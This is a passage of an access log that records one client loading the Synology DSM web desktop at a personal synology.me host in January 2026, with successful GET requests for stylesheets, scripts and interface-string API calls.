84.1.26.27] [Length 4601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/VideoPlayer2/style.css?v=1649656611" [Client 84.1.26.27] [Length 1998] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PkgManApp/style.css?v=1661757678" [Client 84.1.26.27] [Length 5292] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/EnableNewUpdateSetting/style.css?v=1661421011" [Client 84.1.26.27] [Length 983] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DesktopProgress/style.css?v=1661757678" [Client 84.1.26.27] [Length 860] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/StorageManager/style.css?v=1661421011" [Client 84.1.26.27] [Length 28078] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SharingManager/style.css?v=1661757678" [Client 84.1.26.27] [Length 229] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ClipBoardJS/style.css?v=1661757678" [Client 84.1.26.27] [Length 387] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/FileChooserV6/style.css?v=1661757678" [Client 84.1.26.27] [Length 1098] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PhotoViewer/style.css?v=1661757678" [Client 84.1.26.27] [Length 3361] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ResourceMonitor/style.css?v=1661421011" [Client 84.1.26.27] [Length 6761] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TaskSchedulerUtils/style.css?v=1661757678" [Client 84.1.26.27] [Length 104] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/OTPWizard/style.css?v=1661757678" [Client 84.1.26.27] [Length 870] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/UpdateMaskApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 481] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/MyDSCenter/style.css?v=1661757678" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/AudioPlayer/style.css?v=1661757678" [Client 84.1.26.27] [Length 3921] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Widgets/style.css?v=1661421011" [Client 84.1.26.27] [Length 3239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/BackgroundTaskMonitor/style.css?v=1661757678" [Client 84.1.26.27] [Length 1934] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DisableAdminNotification/style.css?v=1661421011" [Client 84.1.26.27] [Length 440] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DSMNotify/style.css?v=1661757678" [Client 84.1.26.27] [Length 2159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/HelpBrowser/style.css?v=1661757678" [Client 84.1.26.27] [Length 5614] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Utils/style.css?v=1661757678" [Client 84.1.26.27] [Length 2311] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/WelcomeApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 10609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/AdminCenter/style.css?v=1661226912" [Client 84.1.26.27] [Length 15876] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TaskSchedulerWidget/style.css?v=1661421011" [Client 84.1.26.27] [Length 989] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/BandwidthControl/style.css?v=1634102886" [Client 84.1.26.27] [Length 72] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ConfigBackup/style.css?v=1660704937" [Client 84.1.26.27] [Length 1239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Share/style.css?v=1661757678" [Client 84.1.26.27] [Length 1433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:54 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TinyMCE/style.css?v=1635321605" [Client 84.1.26.27] [Length 4624] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/FileChooser/style.css?v=1661757678" [Client 84.1.26.27] [Length 943] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/ScsiTarget/style.css?v=1659958512" [Client 84.1.26.27] [Length 7620] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/OAuthService/style.css?v=1618330426" [Client 84.1.26.27] [Length 345] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ResetAdminApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 514] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/FileBrowser/style.css?v=1657097204" [Client 84.1.26.27] [Length 12126] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyPhotos/style.css?v=1733908506" [Client 84.1.26.27] [Length 56578] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/CloudSync/style.css?v=1744186293" [Client 84.1.26.27] [Length 8535] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/LogCenter/style.css?v=1657880510" [Client 84.1.26.27] [Length 580] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/AudioStation/style.css?v=1670317322" [Client 84.1.26.27] [Length 17366] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/WebStation/style.css?v=1648710000" [Client 84.1.26.27] [Length 4262] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/FileTaskMonitor/style.css?v=1657097197" [Client 84.1.26.27] [Length 644] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VPNCenter/style.css?v=1656648365" [Client 84.1.26.27] [Length 1201] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/CodecPack/style.css?v=1662540402" [Client 84.1.26.27] [Length 673] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynoFinder/style.css?v=1670389783" [Client 84.1.26.27] [Length 22699] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DirectoryServer/style.css?v=1657077274" [Client 84.1.26.27] [Length 1980] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/HybridShare/style.css?v=1761112552" [Client 84.1.26.27] [Length 1165] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DownloadStation/style.css?v=1714372160" [Client 84.1.26.27] [Length 5968] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyApplicationService/style.css?v=1675505560" [Client 84.1.26.27] [Length 2208] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" [Client 84.1.26.27] [Length 3834] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/HyperBackup/style.css?v=1666887595" [Client 84.1.26.27] [Length 20594] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/MediaServer/style.css?v=1733153684" [Client 84.1.26.27] [Length 877] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/AntiVirus/style.css?v=1676872996" [Client 84.1.26.27] [Length 5551] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/WebDAVServer/style.css?v=1767609886" [Client 84.1.26.27] [Length 294] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive-Drive/style.css?v=1731304858" [Client 84.1.26.27] [Length 75280] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive/style.css?v=1731304862" [Client 84.1.26.27] [Length 13476] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DhcpServer/style.css?v=1639559986" [Client 84.1.26.27] [Length 2046] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/ActiveInsight/style.css?v=1706865053" [Client 84.1.26.27] [Length 797] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/synowebapi.js/synowebapi.min.js?v=1653287912" [Client 84.1.26.27] [Length 12470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/babel-polyfill/polyfill.js?v=1650348555" [Client 84.1.26.27] [Length 47694] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/synocredential.js/synocredential.min.js?v=1661507553" [Client 84.1.26.27] [Length 5114] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VideoStation/style.css?v=1711016943" [Client 84.1.26.27] [Length 102713] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/unsupported-browsers/dist/bundle.js?v=1661421011" [Client 84.1.26.27] [Length 889] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 84.1.26.27] [Length 725] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=1745258201" [Client 84.1.26.27] [Length 201] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=1665685189" [Client 84.1.26.27] [Length 4648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/adapter/ext/ext-base.js?v=1650348555" [Client 84.1.26.27] [Length 12041] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ux/ux-all.js?v=1650348555" [Client 84.1.26.27] [Length 84444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/scrollbar/flexcroll.js?v=1650348555" [Client 84.1.26.27] [Length 8293] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ext-all.js?v=1650348555" [Client 84.1.26.27] [Length 219382] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VideoStation/controller/ui/style.css?v=3.0.7-2512" [Client 84.1.26.27] [Length 14820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/webman/3rdparty/VideoStation/style.css?v=1711016943" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/noise-c.js?v=1650348555" [Client 84.1.26.27] [Length 5302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/constants.js?v=1650348555" [Client 84.1.26.27] [Length 898] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/index.js?v=1650348555" [Client 84.1.26.27] [Length 4478] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vue/vue.min.js?v=1633587521" [Client 84.1.26.27] [Length 33045] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/sodium.js?v=1650348555" [Client 84.1.26.27] [Length 248661] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vuex/vuex.min.js?v=1585722123" [Client 84.1.26.27] [Length 2978] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vue-router/vue-router.min.js?v=1648175353" [Client 84.1.26.27] [Length 9737] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725" [Client 84.1.26.27] [Length 586409] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 